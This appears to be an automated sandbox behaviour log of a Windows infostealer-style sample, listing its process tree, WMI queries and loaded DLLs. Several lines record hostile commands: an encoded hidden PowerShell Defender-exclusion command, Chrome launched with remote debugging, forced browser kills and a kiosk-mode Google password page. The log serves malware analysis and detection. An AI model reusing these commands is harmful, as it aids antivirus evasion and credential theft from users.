                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT CommandLine FROM Win32_Process WHERE ProcessId = 7436
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: 7620ab885d.exe, 00000009.00000003.2063567069.000000000574B000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2093962939.000000000574F000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2063391591.0000000005766000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2141141419.0000000005A86000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2142251939.0000000005A69000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2579315822.00000000054DB000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2578594447.00000000054F7000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2608323246.00000000054DE000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703321855.0000000005966000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703924388.0000000005949000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: cMTqzvmx9u.exeReversingLabs: Detection: 50%
                    Source: cMTqzvmx9u.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: skotes.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeFile read: C:\Users\user\Desktop\cMTqzvmx9u.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\cMTqzvmx9u.exe "C:\Users\user\Desktop\cMTqzvmx9u.exe"
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe "C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe "C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe "C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeProcess created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1980
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe "C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe "C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe "C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe"
                    Source: unknownProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe"
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                    Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2068,i,843618081044159646,7048051155427762335,262144 /prefetch:8
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                    Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    Source: unknownProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2200 -prefMapHandle 2192 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c580837b-9763-4e9e-ad1e-338f434464c7} 2752 "\\.\pipe\gecko-crash-server-pipe.2752" 20ea916db10 socket
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe "C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe "C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe "C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe "C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe "C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe "C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeProcess created: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeProcess created: C:\Program Files\Windows Media Player\graph\graph.exe "C:\Program Files\Windows Media Player\graph\graph.exe"
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeProcess created: unknown unknown
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeProcess created: unknown unknown
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
                    Source: C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2068,i,843618081044159646,7048051155427762335,262144 /prefetch:8
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2200 -prefMapHandle 2192 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c580837b-9763-4e9e-ad1e-338f434464c7} 2752 "\\.\pipe\gecko-crash-server-pipe.2752" 20ea916db10 socket
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Program Files\Mozilla Firefox\firefox.exeProcess created: unknown unknown
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: mstask.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: dui70.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: duser.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: chartv.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: oleacc.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: atlthunk.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: textshaping.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: explorerframe.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeSection loaded: iertutil.dllJump to behavior
